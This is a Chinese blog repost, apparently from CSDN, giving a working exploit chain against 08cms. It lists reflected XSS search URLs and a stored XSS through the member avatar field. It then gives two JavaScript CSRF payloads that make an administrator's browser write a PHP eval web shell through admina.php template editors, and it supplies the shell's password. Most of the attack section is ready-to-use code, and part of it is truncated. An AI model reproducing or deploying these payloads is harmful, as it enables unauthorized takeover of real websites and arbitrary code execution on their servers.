php 删除%3ca%3e标签,08cms会员中心xss+csrf可getshell

该博客揭露了一个站点的反射型XSS漏洞,涉及PHP代码执行,包括利用adminm.php和admina.php进行文件操作。作者详细介绍了两种不同版本的getshell方法,并展示了针对3.0前后版本的攻击脚本。
摘要由CSDN通过智能技术生成

这个属于本站原创,很难看到的哦

首先是在搜索出存在反射性的跨站

搜索处存在反射性xss

[php]

http://0day5.com/search.php?caid=2&ccid1=208&chid=4&djfrom=1&djto=1

http://0day5.com/search.php?caid=2&ccid1=208&chid=4&djfrom=1&djto=1

http://0day5.com/search.php?caid=4&chid=2&mchid=1&zjfrom=1&zjto=1

http://0day5.com/search.php?caid=4&chid=2&mchid=1&zjfrom=1&zjto=1

[/php]

会员中心adminm.php?action=memberinfo

修改头像的时候发现可以外部调用,仅仅是检查了后缀,然后在附件的地方插入

[php]

http://0day5.com/">

adminc/images/logo_member.png[/php]

返回我的首页,发现成功的触发了xss

然后在后台测试,发现了两种不同的getshell的办法

针对3.0以前的附上js脚本,3.0以后的没条件测试。通过演示站目测的。不行就算了

[php]

function ajax(){

var request = false;

if(window.XMLHttpRequest) {

request = new XMLHttpRequest();

} else if(window.ActiveXObject) {

var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0', 'Msxml2.XMLHTTP.6.0', 'Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];

for(var i=0; i

try {

request = new ActiveXObject(versions[i]);

} catch(e) {}

}

}

return request;

}

var _x = ajax();

postgo();

function postgo() {

src="/admina.php?entry=csstpls&action=filedetail&filename=0day5.php&jsmode=1&forward=";

data="contentnew=%3C%3Fphp+eval%28%24_POST%5B0day5%5D%29%3B+%3F%3E&bfiledetail=%CC%E1%BD%BB";

xhr_act("POST",src,data);

}

function xhr_act(_m,_s,_a){

_x.open(_m,_s,false);

if(_m=="POST")_x.setRequestHeader("Content-Type","application/x-www-form-urlencoded");

_x.send(_a);

return _x.responseText;

}[/php]

针对3.0以后的在其他的地方

[php]

function ajax(){

var request = false;

if(window.XMLHttpRequest) {

request = new XMLHttpRequest();

} else if(window.ActiveXObject) {

var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0', 'Msxml2.XMLHTTP.6.0', 'Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];

for(var i=0; i

try {

request = new ActiveXObject(versions[i]);

} catch(e) {}

}

}

return request;

}

var _x = ajax();

postgo();

function postgo() {

src="/admina.php?entry=sptpls&action=sptpldetail&spid=search";

data="contentnew=%3C%3Fphp+eval%28%24_POST%5B0day5%5D%29%3B+%3F%3E&bfiledetail=%CC%E1%BD%BB";

xhr_act("POST",src,data);

}

function xhr_act(_m,_s,_a){

_x.open(_m,_s,false);

if(_m=="POST")_x.setRequestHeader("Content-Type","application/x-www-form-urlencoded");

_x.send(_a);

return _x.responseText;

}[/php]

成功后连接search.php 密码是0day5

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值